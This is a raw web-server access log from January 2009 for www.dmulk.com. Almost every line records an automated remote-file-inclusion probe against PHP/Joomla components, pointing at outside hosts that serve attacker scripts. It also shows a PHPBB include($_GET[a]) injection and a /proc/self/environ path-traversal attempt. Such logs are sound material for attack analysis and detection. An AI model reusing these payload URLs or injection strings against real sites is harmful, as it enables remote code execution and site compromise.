207.182.137.218 - - [30/Jan/2009:08:20:46 -0800] "GET /logs/access_080511.log/senetman/html/index.php?page=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:20:47 -0800] "GET /senetman/html/index.php?page=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.182.137.218 - - [30/Jan/2009:08:20:53 -0800] "GET /logs/access_080409.log/senetman/html/index.php?page=http://www.geocities.com/elsiputri/idpit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:08:20:54 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:08:20:54 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:20:59 -0800] "GET /logs/index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:21:00 -0800] "GET /index.php?incl=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 94754 "-" "libwww-perl/5.823" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:21:06 -0800] "GET /logs/access_080729.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:16 -0800] "GET /logs/access_080320.log%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://bigbeebiz.com/orca/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:21:19 -0800] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:21:20 -0800] "GET /logs/access_071227.log/modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:21:22 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:21:22 -0800] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:21:23 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:21:23 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:21:23 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.5 - - [30/Jan/2009:08:21:24 -0800] "GET /logs//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:31 -0800] "GET /logs/access_080320.log%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://bigbeebiz.com/orca/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:21:34 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:21:34 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:21:34 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:39 -0800] "GET /logs/access_080320.log%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://bigbeebiz.com/orca/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:21:44 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:21:45 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.48.248 - - [30/Jan/2009:08:21:45 -0800] "GET /logs//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:46 -0800] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:50 -0800] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:50 -0800] "GET /logs/access_080627.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:21:52 -0800] "GET /logs/access_080311.log//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:21:55 -0800] "GET /logs/access_080824.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:21:57 -0800] "GET /logs/access_081127.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:02 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:02 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:03 -0800] "GET /logs//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:22:06 -0800] "GET /logs/access_080824.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:09 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:09 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [30/Jan/2009:08:22:10 -0800] "GET /logs//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:22:10 -0800] "GET /logs/access_080422.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.84.243.81 - - [30/Jan/2009:08:22:11 -0800] "GET /logs/access_080824.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.sava-mebel.ru//assets/images/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:22:11 -0800] "GET /logs/access_080806.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:22:14 -0800] "GET /logs/access_080731.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:22:27 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ilco.org//cache/ready?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:22:28 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ilco.org//cache/ready?? HTTP/1.1" 200 95134 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:22:30 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ilco.org//cache/ready?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:22:43 -0800] "GET /logs/access_080821.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:22:47 -0800] "GET /logs/access_080305.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:22:48 -0800] "GET /logs/access_081123.log//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:22:48 -0800] "GET /help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.97.43.5 - - [30/Jan/2009:08:22:48 -0800] "GET /logs//help/english/top.php?dir_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:23:08 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:08:23:15 -0800] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:08:23:15 -0800] "GET /logs/access_081001.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:23:16 -0800] "GET /logs/access_080717.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:23:19 -0800] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:23:20 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:23:20 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
66.135.35.39 - - [30/Jan/2009:08:23:29 -0800] "GET /logs/index.php?nivel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.135.35.39 - - [30/Jan/2009:08:23:29 -0800] "GET /index.php?nivel=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 95055 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:23:46 -0800] "GET /logs/access_080404.log%20/modules/My_eGallery/public/displayCategory.php?basepath=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:08:23:48 -0800] "GET /?show=slide&pageid=159&nggpage=2 HTTP/1.0" 200 149602 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:08:23:55 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:08:23:55 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:08:23:55 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.104.102 - - [30/Jan/2009:08:24:03 -0800] "GET /logs/access_081129.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://ilco.org//cache/ready?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:24:07 -0800] "GET /logs/access_080311.log//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:24:30 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:24:33 -0800] "GET /logs/access_080529.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:24:40 -0800] "GET /logs/access_080808.log%20%20/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:25:14 -0800] "GET /logs/access_080408.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:26:00 -0800] "GET /logs/access_080424.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:26:03 -0800] "GET /logs/access_080520.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.58.65.23 - - [30/Jan/2009:08:26:11 -0800] "GET /logs/access_081001.log//frame.php?loc=http://www.hassenrasool.com/shop/han.cur??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.58.65.23 - - [30/Jan/2009:08:26:12 -0800] "GET /frame.php?loc=http://www.hassenrasool.com/shop/han.cur??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.58.65.23 - - [30/Jan/2009:08:26:15 -0800] "GET /logs//frame.php?loc=http://www.hassenrasool.com/shop/han.cur??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:26:48 -0800] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:26:48 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
202.58.65.23 - - [30/Jan/2009:08:26:49 -0800] "GET /logs/access_080620.log//frame.php?loc=http://www.hassenrasool.com/shop/han.cur??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:27:12 -0800] "GET /logs/access_080821.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:27:13 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.98.48.132 - - [30/Jan/2009:08:27:13 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/indonesiacrackers/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:27:47 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:27:52 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:27:53 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:28:07 -0800] "GET /logs/index.php?option=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:28:08 -0800] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:28:09 -0800] "GET /logs/access_080401.log/index.php?option=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:28:11 -0800] "GET /index.php?option=http://www.articlecollections.co.cc/admin/backup/V8.txt???? HTTP/1.1" 200 94922 "-" "libwww-perl/5.805" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:28:20 -0800] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:28:25 -0800] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.51.178 - - [30/Jan/2009:08:28:26 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.254.51.178 - - [30/Jan/2009:08:28:26 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.254.51.178 - - [30/Jan/2009:08:28:26 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
65.254.51.178 - - [30/Jan/2009:08:28:27 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://crosszero.org/zero/iddd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:28:45 -0800] "GET /logs/access_080521.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:28:47 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:28:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_typedcontent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.823" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:28:51 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:28:58 -0800] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.97.226.250 - - [30/Jan/2009:08:28:59 -0800] "GET /logs/access_081130.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
